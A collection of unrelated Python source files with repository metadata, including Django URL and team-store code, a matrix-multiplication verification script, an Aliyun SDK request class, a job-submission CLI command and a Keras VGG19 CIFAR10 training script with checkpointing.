2cda56436ed6dea65d38774f7c9ed6c3315dbc03
|
[
"Apache-2.0"
] | 1
|
2018-03-07T08:33:23.000Z
|
2018-03-07T08:33:23.000Z
|
xtra/sample/app/urls.py
|
HyechurnJang/archon
|
2cda56436ed6dea65d38774f7c9ed6c3315dbc03
|
[
"Apache-2.0"
] | 2
|
2017-03-14T01:02:55.000Z
|
2017-03-14T01:07:29.000Z
|
xtra/sample/app/urls.py
|
HyechurnJang/archon
|
2cda56436ed6dea65d38774f7c9ed6c3315dbc03
|
[
"Apache-2.0"
] | 4
|
2017-02-03T04:53:07.000Z
|
2020-04-20T07:52:47.000Z
|
# -*- coding: utf-8 -*-
################################################################################
# _____ _ _____ _ #
# / ____(_) / ____| | | #
# | | _ ___ ___ ___ | (___ _ _ ___| |_ ___ _ __ ___ ___ #
# | | | / __|/ __/ _ \ \___ \| | | / __| __/ _ \ '_ ` _ \/ __| #
# | |____| \__ \ (_| (_) | ____) | |_| \__ \ || __/ | | | | \__ \ #
# \_____|_|___/\___\___/ |_____/ \__, |___/\__\___|_| |_| |_|___/ #
# __/ | #
# |___/ #
# _ __ _____ _ _____ ______ #
# | |/ / / ____| | |/ ____| ____| #
# | ' / ___ _ __ ___ __ _ | (___ ___ | | (___ | |__ #
# | < / _ \| '__/ _ \/ _` | \___ \ / _ \| |\___ \| __| #
# | . \ (_) | | | __/ (_| | ____) | (_) | |____) | |____ #
# |_|\_\___/|_| \___|\__,_| |_____/ \___/|_|_____/|______| #
# #
################################################################################
# #
# Copyright (c) 2016 Cisco Systems #
# All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# License for the specific language governing permissions and limitations #
# under the License. #
# #
################################################################################
from django.conf.urls import url, include
from . import views
#===============================================================================
# Link your view here.
#===============================================================================
url_dropdown = [
url(r'sample1/?', views.sample1, name=u'샘플1'),
url(r'sample2/?', views.sample2, name=u'샘플2'),
]
urlpatterns = [
url(r'dropdown/', include(url_dropdown, namespace=u'드롭다운리스트')),
url(r'direct_sample/?', views.direct_sample, name=u'즉시로딩'),
]
| 64.423077
| 81
| 0.28597
|
828ca23a5b6e76bf683fdb5bf99aee451b120a82
| 3,206
|
py
|
Python
|
codegen/verify.py
|
RobinZhang14ZLP/fast-matmul
|
8bc5d3a7a5da86e191a5ddb39e88b4a2ce60315b
|
[
"BSD-2-Clause"
] | null | null | null |
codegen/verify.py
|
RobinZhang14ZLP/fast-matmul
|
8bc5d3a7a5da86e191a5ddb39e88b4a2ce60315b
|
[
"BSD-2-Clause"
] | null | null | null |
codegen/verify.py
|
RobinZhang14ZLP/fast-matmul
|
8bc5d3a7a5da86e191a5ddb39e88b4a2ce60315b
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2014-2015, Sandia Corporation
# All rights reserved.
#
# This file is part of fast-matmul and is under the BSD 2-Clause License,
# which can be found in the LICENSE file in the root directory, or at
# http://opensource.org/licenses/BSD-2-Clause.
import sys
# the sizes; we check mxnxk matmul with q products, assuming row-major ordering.
m = int(sys.argv[1])
n = int(sys.argv[2])
k = int(sys.argv[3])
q = int(sys.argv[4])
# read in U,V,W
U = []
V = []
W = []
#for i in range(m*n):
# U.append([])
# V.append([])
# W.append([])
for j in range(m*n):
line = sys.stdin.readline().split()
U.append([])
while line[0] == "#":
line = sys.stdin.readline().split()
if len(line) != q:
print( "Trouble at line",j,"of U, should have",q,"entries, has",len(line) )
for i in range(q):
U[j].append(float(line[i]))
for j in range(n*k):
line = sys.stdin.readline().split()
V.append([])
while line[0] == "#":
line = sys.stdin.readline().split()
if len(line) != q:
print( "Trouble at line",j,"of V, should have",q,"entries, has",len(line) )
for i in range(q):
V[j].append(float(line[i]))
for j in range(m*k):
line = sys.stdin.readline().split()
W.append([])
while line[0] == "#":
line = sys.stdin.readline().split()
if len(line) != q:
print( "Trouble at line", j, "of W, should have", q, "entries, has", len(line) )
for i in range(q):
W[j].append(float(line[i]))
print( "U" )
for r in U:
print (r)
print( "V" )
for r in V:
print (r)
print( "W" )
for r in W:
print (r)
#print "Ut"
#Ut = []
#for j in range(len(U[0])):
# Ut.append([])
# for i in range(len(U)):
# Ut[j].append(U[i][j])
#for r in Ut:
# print r
#print "Vt"
#Vt = []
#for j in range(len(V[0])):
# Vt.append([])
# for i in range(len(V)):
# Vt[j].append(V[i][j])
#for r in Vt:
# print r
#print "Wt"
#Wt = []
#for j in range(len(W[0])):
# Wt.append([])
# for i in range(len(W)):
# Wt[j].append(W[i][j])
#for r in Wt:
# print r
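# Check the Brent equations: the <m,n,k> algorithm with q products is exact iff, for all
# index combinations, sum_i U[a*n+b][i] * V[c*k+d][i] * W[e*k+f][i] equals 1 when
# a == e, b == c and d == f, and equals 0 otherwise.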
for a in range(m):
for b in range(n):
# a and b describe row of U
rU = a*n+b
for c in range(n):
for d in range(k):
rV = c*k+d
for e in range(m):
for f in range(k):
rW = e*k+f
# compute the contribution
sum = 0
for i in range(q):
sum += U[rU][i]*V[rV][i]*W[rW][i]
if a == e and b == c and d == f:
# should be a 1
if sum != 1:
print( "Trouble at", a, b, c, d, e, f, "sum should be 1, is ", sum)
print( "\tcheck row",rU,"of U, row",rV,"of V, and row",rW,"of W")
else:
if sum != 0:
print( "Trouble at", a, b, c, d, e, f, "sum should be 0, is ", sum)
print( "\tcheck row",a*n+b,"of U, row",c*k+d,"of V, and row",e*k+f,"of W")
| 27.401709
| 106
| 0.468808
|
42237db1314ef0fd26230ec1fc841a24b6124a52
| 9,315
|
py
|
Python
|
src/api/store/team.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
src/api/store/team.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
src/api/store/team.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
from database.models import Team, UserProfile, Media, Community, TeamMember
from _main_.utils.massenergize_errors import MassEnergizeAPIError, InvalidResourceError, ServerError, CustomMassenergizeError, NotAuthorizedError
from _main_.utils.massenergize_response import MassenergizeResponse
from django.utils.text import slugify
from _main_.utils.context import Context
from .utils import get_community_or_die, get_user_or_die
class TeamStore:
def __init__(self):
self.name = "Team Store/DB"
def get_team_info(self, team_id) -> (dict, MassEnergizeAPIError):
team = Team.objects.get(id=team_id)
if not team:
return None, InvalidResourceError()
return team, None
def get_team_admins(self, context, team_id):
if not team_id:
return []
return [a.user for a in TeamMember.objects.filter(is_admin=True, is_deleted=False) if a.user is not None]
def list_teams(self, context: Context, args) -> (list, MassEnergizeAPIError):
try:
community = get_community_or_die(context, args)
user = get_user_or_die(context, args)
if community:
teams = Team.objects.filter(community=community)
elif user:
teams = user.team_set.all()
return teams, None
except Exception as e:
return None, CustomMassenergizeError(e)
def team_stats(self, context: Context, args) -> (list, MassEnergizeAPIError):
try:
community = get_community_or_die(context, args)
teams = Team.objects.filter(community=community)
ans = []
for team in teams:
res = {"members": 0, "households": 0, "actions": 0, "actions_completed": 0, "actions_todo": 0}
res["team"] = team.simple_json()
# team.members deprecated
# for m in team.members.all():
members = TeamMember.objects.filter(team=team)
res["members"] = members.count()
for m in members:
user = m.user
res["households"] += user.real_estate_units.count()
actions = user.useractionrel_set.all()
res["actions"] += len(actions)
res["actions_completed"] += actions.filter(**{"status":"DONE"}).count()
res["actions_todo"] += actions.filter(**{"status":"TODO"}).count()
ans.append(res)
return ans, None
except Exception as e:
return None, CustomMassenergizeError(e)
def create_team(self, user_id, args) -> (dict, MassEnergizeAPIError):
team = None
try:
community_id = args.pop('community_id', None)
image = args.pop('image', None)
admin_emails = args.pop('admin_emails', "").split(",")
if community_id:
community = Community.objects.filter(pk=community_id).first()
if not community:
return None, CustomMassenergizeError("Please provide a valid community")
else:
return None, CustomMassenergizeError("Please provide a community")
args["community"] = community
new_team = Team.objects.create(**args)
team = new_team
if image:
logo = Media.objects.create(file=image, name=f"{slugify(new_team.name)}-TeamLogo")
logo.save()
new_team.logo = logo
new_team.save()
for admin_email in admin_emails:
user = UserProfile.objects.filter(email=admin_email).first()
if user:
teamMember, ok = TeamMember.objects.get_or_create(team=team,user=user)
teamMember.is_admin = True
teamMember.save()
if user_id:
# team.members deprecated
teamMember = TeamMember.objects.create(team=team,user=user_id, is_admin=True)
#new_team.members.add(user_id)
#new_team.admins.add(user_id)
teamMember.save()
#new_team.save()
return new_team, None
except Exception as e:
print(e)
if team:
team.delete()
return None, CustomMassenergizeError(str(e))
def update_team(self, team_id, args) -> (dict, MassEnergizeAPIError):
try:
community_id = args.pop('community_id', None)
logo = args.pop('logo', None)
team = Team.objects.filter(id=team_id)
team.update(**args)
team = team.first()
if team:
if community_id:
community = Community.objects.filter(pk=community_id).first()
if community:
team.community = community
if logo:
logo = Media.objects.create(file=logo, name=f"{slugify(team.name)}-TeamLogo")
logo.save()
team.logo = logo
team.save()
return team, None
except Exception as e:
return None, CustomMassenergizeError(e)
def delete_team(self, team_id) -> (dict, MassEnergizeAPIError):
try:
print(team_id)
teams = Team.objects.filter(id=team_id)
if not teams:
return None, InvalidResourceError()
# team.members deprecated. Delete TeamMembers separate step
team = teams.first()
      members = TeamMember.objects.filter(team=team)
msg = "delete_team: Team %s deleting %d members" % (team.name,members.count())
print(msg)
members.delete()
      team.delete()
      return team, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def join_team(self, team_id, user_id) -> (Team, MassEnergizeAPIError):
try:
team = Team.objects.get(id=team_id)
user = UserProfile.objects.get(id=user_id)
      teamMember = TeamMember.objects.create(team=team, user=user)
teamMember.save()
print("join_team")
#team.members.add(user_id)
#team.save()
return team, None
except Exception as e:
return None, CustomMassenergizeError(str(e))
def leave_team(self, team_id, user_id) -> (Team, MassEnergizeAPIError):
try:
team = Team.objects.get(id=team_id)
user = UserProfile.objects.get(id=user_id)
teamMembers = TeamMember.objects.filter(team=team, user=user)
teamMembers.delete()
print("leave_team")
#team.members.remove(user_id)
#team.admins.remove(user_id)
#team.save()
return team, None
except Exception as e:
return None, CustomMassenergizeError(str(e))
def add_team_member(self, context: Context, args) -> (Team, MassEnergizeAPIError):
try:
print(args)
team_id = args.pop('team_id', None)
user = get_user_or_die(context, args)
status = args.pop('is_admin', None) == 'true'
if not team_id :
return None, CustomMassenergizeError("Missing team_id")
team_member: TeamMember = TeamMember.objects.filter(team__id=team_id, user=user).first()
if team_member:
team_member.is_admin = status
team_member.save()
else:
team = Team.objects.filter(pk=team_id).first()
if not team_id and not user:
return None, CustomMassenergizeError("Invalid team or user")
team_member = TeamMember.objects.create(is_admin=status, team=team, user=user)
return team_member, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def remove_team_member(self, context: Context, args) -> (Team, MassEnergizeAPIError):
try:
team_id = args.pop('team_id', None)
user = get_user_or_die(context, args)
res = {}
if team_id and user:
team_member = TeamMember.objects.filter(team__id=team_id, user=user)
res = team_member.delete()
return res, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def members(self, context: Context, args) -> (Team, MassEnergizeAPIError):
try:
if not context.user_is_admin():
return None, NotAuthorizedError()
team_id = args.get('team_id', None)
if not team_id:
return [], CustomMassenergizeError('Please provide a valid team_id')
members = TeamMember.objects.filter(is_deleted=False, team__id=team_id)
return members, None
except Exception:
return None, InvalidResourceError()
def list_teams_for_community_admin(self, context: Context, args) -> (list, MassEnergizeAPIError):
try:
if context.user_is_super_admin:
return self.list_teams_for_super_admin(context)
elif not context.user_is_community_admin:
return None, NotAuthorizedError()
community_id = args.pop('community_id', None)
if not community_id:
user = UserProfile.objects.get(pk=context.user_id)
admin_groups = user.communityadmingroup_set.all()
comm_ids = [ag.community.id for ag in admin_groups]
teams = Team.objects.filter(community__id__in = comm_ids, is_deleted=False).select_related('logo', 'community')
return teams, None
teams = Team.objects.filter(community__id = community_id, is_deleted=False).select_related('logo', 'community')
return teams, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def list_teams_for_super_admin(self, context: Context):
try:
if not context.user_is_super_admin:
return None, NotAuthorizedError()
teams = Team.objects.filter(is_deleted=False).select_related('logo', 'community')
return teams, None
except Exception as e:
print(e)
return None, CustomMassenergizeError(str(e))
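# Example usage (illustrative sketch; requires a configured Django environment and a valid Context):
# store = TeamStore()
# teams, err = store.list_teams_for_super_admin(context)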
| 33.872727
| 145
| 0.659796
|
e7ecbdd676e062d9dbb02397884e661395c9698e
| 1,348
|
py
|
Python
|
aliyun-python-sdk-elasticsearch/aliyunsdkelasticsearch/request/v20170613/CreateDataSourceRequest.py
|
ankitdobhal/aliyun-openapi-python-sdk
|
991b1c2d91adc468480defc23ba790d4369cce7b
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-elasticsearch/aliyunsdkelasticsearch/request/v20170613/CreateDataSourceRequest.py
|
ankitdobhal/aliyun-openapi-python-sdk
|
991b1c2d91adc468480defc23ba790d4369cce7b
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-elasticsearch/aliyunsdkelasticsearch/request/v20170613/CreateDataSourceRequest.py
|
ankitdobhal/aliyun-openapi-python-sdk
|
991b1c2d91adc468480defc23ba790d4369cce7b
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RoaRequest
from aliyunsdkelasticsearch.endpoint import endpoint_data
class CreateDataSourceRequest(RoaRequest):
def __init__(self):
RoaRequest.__init__(self, 'elasticsearch', '2017-06-13', 'CreateDataSource','elasticsearch')
self.set_uri_pattern('/openapi/datasources')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
| 40.848485
| 95
| 0.775223
|
acd846dd1f365e41268b403eb39e1a57fcece476
| 13,763
|
py
|
Python
|
ch/cli/run.py
|
zuiwan/CodingHub-CLI
|
9ced732de351412f1fd32b3a5eb67117e42779f6
|
[
"Apache-2.0"
] | null | null | null |
ch/cli/run.py
|
zuiwan/CodingHub-CLI
|
9ced732de351412f1fd32b3a5eb67117e42779f6
|
[
"Apache-2.0"
] | null | null | null |
ch/cli/run.py
|
zuiwan/CodingHub-CLI
|
9ced732de351412f1fd32b3a5eb67117e42779f6
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from __future__ import print_function
import shutil
import click
import sys
from checksumdir import dirhash
try:
from pipes import quote as shell_quote
except ImportError:
from shlex import quote as shell_quote
from tabulate import tabulate
from time import sleep
from ch.cli.utils import (wait_for_url, get_files_in_current_directory, sizeof_fmt, copy_files)
from ch.client.env import EnvClient
from ch.client.job import ExperimentClient
from ch.client.project import ProjectClient
from ch.manager.auth_config import AuthConfigManager
from ch.manager.experiment_config import ExperimentConfigManager
from ch.model.job import JobReq, JobSpecification
from ch.log import logger as logger
import webbrowser
_TEMP_DIR = ".codinghubTemp"
@click.command()
@click.option('--data',
multiple=True,
help='Data source id(s) to use')
@click.option('--jupyter/--no-jupyter',
help='Open jupyter mode',
default=False)
@click.option('--resubmit/--no-resubmit',
help='Resubmit job request (will not create new job, generally after the last submit is rejected)',
default=False)
@click.option('--eager/--no-eager',
help='Run instantly(as soon as fast)',
default=False)
@click.option('--value',
type=click.FLOAT,
help='Bidding price(¥Yuan) for this run')
@click.option('--duration',
type=click.STRING,
help='Estimated total duration of this run, format like "7d5h10m2s" in golang')
@click.option('--earliest',
type=str,
help='The beginning of time window for this run')
@click.option('--deadline',
type=str,
help='The deadline of time window for this run')
@click.option('--tensorboard/--no-tensorboard',
help='Open tensorboard service',
default=False)
@click.option('--env',
help='Deep learning framework environment type to use')
@click.option('--os',
help="Operating System to use")
@click.option('-gt', '--gputype',
help="GPU type to use")
@click.option('-gn', '--gpunum',
help="GPU card num to use")
@click.option('-ct', '--cputype',
help="CPU type to use")
@click.option('-cn', '--cpunum',
help='CPU core num to use')
@click.option('-mt', '--memtype',
help="Memory type to use")
@click.option('-mn', '--memnum',
help='Memory GB num to use')
@click.option('--message', '-m',
help='Message to commit',
type=click.STRING,
default="")
@click.option('--version', '-v',
help='Code Version to run',
type=click.INT)
# @click.option('--tensorboard/--no-tensorboard',
# help='Run tensorboard')
@click.argument('command', nargs=-1)
def run(resubmit, command, env, jupyter, tensorboard, data, version, message, os, cputype, cpunum, gputype, gpunum,
memtype, memnum, eager, value, earliest, deadline, duration):
'''
:param resubmit:
:param command:
:param env:
:param jupyter:
:param tensorboard:
:param data:
:param version:
:param message:
:param os:
:param cputype:
:param cpunum:
:param gputype:
:param gpunum:
:param memtype:
:param memnum:
:param eager:
:param value:
:param earliest:
:param deadline:
:param duration:
:return:
'''
"""
"""
    # initialize the experiment client
try:
ec = ExperimentClient()
except Exception as e:
logger.error(str(e))
return
if resubmit is True:
        # only the bidding-related parameters matter for a resubmit
        jobSpec = {}  # read the details of the last bid (the rejected one, or the last accepted one in the local config) from the local config file or the server
jobId = jobSpec["id"]
        # submit the job request
jobReq = JobReq(duration=duration, tw_end=deadline, tw_start=earliest, job_id=jobId, value=value,
resources=jobSpec["resources"])
resp = ec.submit(jobId, jobReq)
if resp["accepted"] == False:
logger.info("This job submit is not accepted, reason: {}".format(resp["message"]))
return
    # check the commit message length
if message and len(message) > 1024:
logger.error("Message body length over limit")
return
    # get the authentication token
access_token = AuthConfigManager.get_access_token()
    # read the local experiment configuration
experiment_config = ExperimentConfigManager.get_config()
    # assemble the command parts into a single string
command_str = ' '.join(command)
    # # process the mounted datasets
# success, data_ids = process_data_ids(data)
# if not success:
# return
    # handle the deep learning framework configuration
if not env:
        # not specified: use the default framework of the project this job belongs to
env = ProjectClient().get_project_info_by_id(experiment_config["project_id"]).get('default_env')
    # check that the requested resource combination is valid
if not validate_resource_list(env, jupyter, tensorboard, os, cputype, cpunum, gputype, gpunum):
return
    # upload the code to the cloud, or reference an existing cloud code version
    # # if a code version was specified
# if version:
# module_resp = ModuleClient().get_by_entity_id_version(experiment_config.project_id, version)
# if not module_resp:
# logger.error("Remote project does not existed")
# return
# module_id = module_resp.get('id')
# else:
# # Gen temp dir
# try:
# # upload_files, total_file_size_fmt, total_file_size = get_files_in_directory('.', 'code')
# # save_dir(upload_files, _TEMP_DIR)
# file_count, size = get_files_in_current_directory('code')
# if size > 100 * 1024 * 1024:
# sys.exit("Total size: {}. "
# "Code size too large to sync, please keep it under 100MB."
# "If you have data files in the current directory, please upload them "
# "separately using \"russell data\" command and remove them from here.\n".format(
# sizeof_fmt(size)))
# copy_files('.', _TEMP_DIR)
# except OSError:
# sys.exit("Directory contains too many files to upload. Add unused directories to .russellignore file.")
# # logger.info("Creating project run. Total upload size: {}".format(total_file_size_fmt))
# # logger.debug("Creating module. Uploading: {} files".format(len(upload_files)))
#
# hash_code = dirhash(_TEMP_DIR)
# logger.debug("Checking MD5 ...")
# module_resp = ModuleClient().get_by_codehash_entity_id(hash_code, experiment_config.project_id)
# if module_resp: # if code same with older version, use existed, don`t need upload
# module_id = module_resp.get('id')
# version = module_resp.get('version')
# logger.info("Use older version-{}.".format(version))
# else:
# version = experiment_config.version
# # Create module
# module = Module(name=experiment_config.name,
# description=message,
# family_id=experiment_config.family_id,
# version=version,
# module_type="code",
# entity_id=experiment_config.project_id
# )
# module_resp = mc.create(module)
# if not module_resp:
# logger.error("Remote project does not existed")
# return
# version = module_resp.get('version')
# experiment_config.set_version(version=version)
# ExperimentConfigManager.set_config(experiment_config)
#
# module_id = module_resp.get('id')
# project_id = module_resp.get('entity_id')
# if not project_id == experiment_config.project_id:
# logger.error("Project conflict")
#
# logger.debug("Created module with id : {}".format(module_id))
#
# # Upload code to fs
# logger.info("Syncing code ...")
# fc = FsClient()
# try:
# fc.socket_upload(file_type="code",
# filename=_TEMP_DIR,
# access_token=access_token.token,
# file_id=module_id,
# user_name=access_token.username,
# data_name=experiment_config.name)
# except Exception as e:
# shutil.rmtree(_TEMP_DIR)
# logger.error("Upload failed: {}".format(str(e)))
# return
# else:
# ### check socket state, some errors like file-server down, cannot be catched by `except`
# state = fc.get_state()
# if state == SOCKET_STATE.FAILED:
# logger.error("Upload failed, please try after a while...")
# return
# finally:
# try:
# shutil.rmtree(fc.temp_dir)
# except FileNotFoundError:
# pass
#
# ModuleClient().update_codehash(module_id, hash_code)
# logger.info("\nUpload finished")
#
# # rm temp dir
# shutil.rmtree(_TEMP_DIR)
# logger.debug("Created code with id : {}".format(module_id))
    # create the job specification
jobSpecification = JobSpecification(message=message, code_id="", data_ids=[],
command=command_str,
project_id=experiment_config["project_id"],
framework=env,
enable_jupyter=jupyter,
enable_tensorboard=tensorboard,
os="ubuntu:16",
gpunum=gpunum,
gputype=gputype,
cpunum=cpunum,
cputype=cputype,
memnum=memnum,
memtype=memtype)
    # submit the job specification; the server persists it
jobId = ec.create(jobSpecification)
logger.debug("Created job specification : {}".format(jobId))
    # # update the local experiment configuration
# experiment_config.set_experiment_predecessor(experiment_id)
# ExperimentConfigManager.set_config(experiment_config)
    # print the job summary
experiment_name = "{}/{}:{}".format(access_token.username,
experiment_config["project_id"],
version)
table_output = [["JOB ID", "NAME", "VERSION"],
[jobId, experiment_name, version]]
logger.info(tabulate(table_output, headers="firstrow"))
logger.info("")
    # submit the job request
jobReq = JobReq(duration=duration, tw_end=deadline, tw_start=earliest, job_id=jobId, value=value,
resources=jobSpecification.resources)
resp = ec.submit(jobId, jobReq)
if resp["accepted"] == False:
logger.info("This job submit is not accepted, reason: {}".format(resp["message"]))
return
    # after the job is successfully submitted, handle jupyter/tensorboard
task_url = {}
if jupyter is True:
while True:
# Wait for the experiment / task instances to become available
try:
experiment = ec.get(jobId)
if experiment.state != "waiting" and experiment.task_instances:
break
except Exception as e:
logger.debug("Experiment not available yet: {}".format(jobId))
logger.debug("Experiment not available yet: {}".format(jobId))
sleep(1)
continue
task_url = ec.get_task_url(jobId)
jupyter_url = task_url["jupyter_url"]
print("Setting up your instance and waiting for Jupyter notebook to become available ...")
if wait_for_url(jupyter_url, sleep_duration_seconds=2, iterations=900):
logger.info("\nPath to jupyter notebook: {}".format(jupyter_url))
webbrowser.open(jupyter_url)
else:
logger.info("\nPath to jupyter notebook: {}".format(jupyter_url))
logger.info(
"Notebook is still loading or can not be connected now. View logs to track progress")
if tensorboard is True:
if not task_url.get("tensorboard_url"):
task_url = ec.get_task_url(jobId)
tensorboard_url = task_url["tensorboard_url"]
logger.info("\nPath to tensorboard: {}".format(tensorboard_url))
logger.info("""
To view logs enter:
ch logs {}
""".format(jobId))
def validate_resource_list(env, jupyter, tensorboard, os, cputype, cpunum, gputype, gpunum):
# TODO
return True
def process_data_ids(data):
# TODO
if len(data) > 5:
logger.error(
"Cannot attach more than 5 datasets to a task")
return False, None
# Get the data entity from the server to:
# 1. Confirm that the data id or uri exists and has the right permissions
# 2. If uri is used, get the id of the dataset
data_ids = []
mc = DataClient()
for data_id_and_path in data:
if ':' in data_id_and_path:
data_id, path = data_id_and_path.split(':')
else:
data_id = data_id_and_path
path = None
data_obj = mc.get(data_id)
if not data_obj:
logger.error("Data not found by id: {}".format(data_id))
return False, None
else:
if path is None:
path = "{}-{}".format(data_obj.name, data_obj.version)
data_ids.append("{id}:{path}".format(id=data_obj.id, path=path))
return True, data_ids
| 38.769014
| 117
| 0.567536
|
c7f400e7edc61e1168d86d42c000d8ad44a1cada
| 7,631
|
py
|
Python
|
examples/pwr_run/checkpointing/final/feedback_v100_only/job69.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/final/feedback_v100_only/job69.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/final/feedback_v100_only/job69.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a VGG network on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.0007
args_model = 'vgg19'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_feedback_fair/' + job_name + '*'
total_epochs = 45
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
if epoch_waste_time > 0:
send_signal.send(args.node, 10002, message)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_feedback_fair/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
message = job_name + ' checkpoint'
send_signal.send(args.node, 10002, message)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch, first_epoch_start
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
